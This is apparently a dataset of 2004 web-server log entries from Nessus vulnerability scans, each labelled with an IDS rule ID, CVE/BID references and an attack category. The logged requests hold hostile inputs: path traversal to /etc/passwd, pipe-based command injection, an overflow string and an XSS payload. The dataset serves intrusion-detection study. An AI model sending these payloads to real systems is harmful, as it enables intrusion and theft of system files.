1288		web-application-activity	WEB-FRONTPAGE /_vti_bin/ access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:50 2004] "GET /_vti_bin/ HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- GET /_vti_bin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=46 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1300	BID3361	attempted-admin	WEB-PHP admin.php file upload attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:09 2004] "GET /cgi-bin/admin.php?upload=1&file=config.php&file_name=nessus.txt&wdir=/images/&userfile=config.php&userfile_name=nessus.txt HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin.php ---------------------------------------- GET /cgi-bin/admin.php?upload=1&file=config.php&file_name=nessus.txt&wdir=/images/&userfile=config.php&userfile_name=nessus.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1301	BID9270 BID3361 BID7532	attempted-recon	WEB-PHP admin.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:42 2004] "GET /admin.php HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin.php ---------------------------------------- GET /admin.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1308		attempted-recon	WEB-CGI sendmessage.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/sendmessage.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendmessage.cgi ---------------------------------------- GET /cgi-bin/sendmessage.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=47 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1309	CAN-1999-0509 CA-1996-11	attempted-recon	WEB-CGI zsh access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/zsh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/zsh ---------------------------------------- GET /cgi-bin/zsh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1385	BID3727 BID3726 Nessus 10849	web-application-activity	WEB-MISC mod-plsql administration access	Request: 217.160.165.173 - - [Fri Mar 12 22:31:00 2004] "GET /admin_/ HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin_ ---------------------------------------- GET /admin_/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=25 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1392	BID3754 BID3755	attempted-recon	WEB-CGI lastlines.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/lastlines.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/lastlines.cgi ---------------------------------------- GET /cgi-bin/lastlines.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=53 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1395	BID3759 CAN-2001-1209	web-application-activity	WEB-CGI zml.cgi attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:14 2004] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/zml.cgi ---------------------------------------- GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1400		web-application-attack	WEB-IIS /scripts/samples/ access	Request: 24.127.175.68 - - [Sat Mar 13 15:13:20 2004] "GET http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: pussyman.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/scripts/samples/" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1454	CAN-2001-0223 Nessus 10597	attempted-recon	WEB-CGI wwwwais access	Request: 217.160.165.173 - - [Fri Mar 12 22:47:41 2004] "GET /cgi-bin/wwwwais HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/wwwwais] for 50000 ms ---------------------------------------- GET /cgi-bin/wwwwais HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/wwwwais" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1455	CVE-2000-0432	attempted-recon	WEB-CGI calender.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:01 2004] "GET /cgi-bin/calendar/calender.pl?config=\|cat%20/etc/passwd\| HTTP/1.1" 403 312 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/calendar ---------------------------------------- GET /cgi-bin/calendar/calender.pl?config=\|cat%20/etc/passwd\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1468	BID1776 CVE-2000-0922	web-application-attack	WEB-CGI Web Shopper shopper.cgi attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:01 2004] "GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/shopper.cgi ---------------------------------------- GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1470	CAN-2001-0997	attempted-recon	WEB-CGI listrec.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc\| HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/listrec.pl ---------------------------------------- GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1471	CAN-2001-0271	attempted-recon	WEB-CGI mailnews.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:35 2004] "GET /cgi-bin/mailnews.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailnews.cgi ---------------------------------------- GET /cgi-bin/mailnews.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1473	CAN-2001-0232	attempted-recon	WEB-CGI newsdesk.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:21 2004] "GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/newsdesk.cgi ---------------------------------------- GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1476	CAN-2001-1130	attempted-recon	WEB-CGI sdbsearch.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:05 2004] "GET /cgi-bin-sdb/sdbsearch.cgi HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-bin-sdb/sdbsearch.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin-sdb/sdbsearch.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/sdbsearch\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1478		attempted-recon	WEB-CGI swc access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:24 2004] "GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/swc ---------------------------------------- GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1479	Nessus 10696 BID2890 CVE-2001-0805	web-application-attack	WEB-CGI ttawebtop.cgi arbitrary file attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:35 2004] "GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1" 403 298 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/ttawebtop.cgi ---------------------------------------- GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1480	BID2890 Nessus 10696 BID2890 CVE-2001-0805	attempted-recon	WEB-CGI ttawebtop.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:43 2004] "GET /cgi-bin/ttawebtop.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ttawebtop.cgi ---------------------------------------- GET /cgi-bin/ttawebtop.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=21 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1481	Nessus 10290	attempted-recon	WEB-CGI upload.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/upload.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/upload.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/upload.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/upload\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1482	Nessus 10294	attempted-recon	WEB-CGI view_source access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:16 2004] "GET /view_source?../../../../../../../../../etc/passwd HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/view_source ---------------------------------------- GET /view_source?../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1486		web-application-activity	WEB-IIS ctss.idc access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:58 2004] "GET /scripts/tools/ctss.idc HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Warning. Pattern match "/ctss\.idc" at THE_REQUEST. ---------------------------------------- GET /scripts/tools/ctss.idc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/\.idc" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1487		web-application-activity	WEB-IIS /iisadmpwd/aexp2.htr access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:48 2004] "GET /iisadmpwd/aexp2.htr HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/iisadmpwd ---------------------------------------- GET /iisadmpwd/aexp2.htr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1488	CAN-2001-0305 BID2385 Nessus 10639	web-application-attack	WEB-CGI store.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:31 2004] "GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1493		web-application-activity	WEB-MISC RBS ISP /newuser access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:11 2004] "GET /newuser HTTP/1.1" 404 287 Handler: (null) Error: mod_security: Warning. Pattern match "/newuser" at THE_REQUEST. ---------------------------------------- GET /newuser HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/newuser" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1495	BID3175 CAN-2001-1115	web-application-activity	WEB-CGI SIX webboard generate.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /cgi-bin/webboard/generate.cgi HTTP/1.1" 404 309 Handler: cgi-script Error: mod_security: Warning. Pattern match "/generate\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/webboard/generate.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/generate\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1497		web-application-attack	WEB-MISC cross site scripting attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:30:26 2004] "GET http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml HTTP/1.1" 403 357 Handler: proxy-server Error: client denied by server configuration: proxy:http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml ---------------------------------------- GET http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1499	Nessus 10778	web-application-activity	WEB-MISC SiteScope Service access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:03 2004] "GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1" 404 310 Handler: (null) Error: mod_security: Warning. Pattern match "/SiteScope/cgi/go\.exe/SiteScope" at THE_REQUEST. ---------------------------------------- GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/SiteScope/cgi/go\.exe/SiteScope" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1501	CAN-2001-0561 Nessus 10669	web-application-attack	WEB-CGI a1stats a1disp3.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:50 2004] "GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/a1disp3.cgi ---------------------------------------- GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1508	cve ,CAN-1999-0885	web-application-activity	WEB-CGI alibaba.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:25 2004] "GET /cgi-bin/alibaba.pl HTTP/1.1" 404 298 Handler: cgi-script Error: mod_security: Warning. Pattern match "/alibaba\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/alibaba.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/alibaba\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1511	CVE-1999-0947 Nessus 10016	web-application-activity	WEB-CGI test.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:35 2004] "GET /test.bat?\|type%20c:\winnt\win.ini HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "/test\.bat" at THE_REQUEST. ---------------------------------------- GET /test.bat?\|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1513	CVE-1999-0947 Nessus 10016	web-application-activity	WEB-CGI input.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:36 2004] "GET /input.bat?\|type%20c:\winnt\win.ini HTTP/1.1" 404 289 Handler: (null) Error: mod_security: Warning. Pattern match "/input\.bat" at THE_REQUEST. ---------------------------------------- GET /input.bat?\|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1515	CVE-1999-0947 Nessus 10016	web-application-activity	WEB-CGI input2.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:37 2004] "GET /input2.bat?\|type%20c:\winnt\win.ini HTTP/1.1" 404 290 Handler: (null) Error: mod_security: Warning. Pattern match "/input2\.bat" at THE_REQUEST. ---------------------------------------- GET /input2.bat?\|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
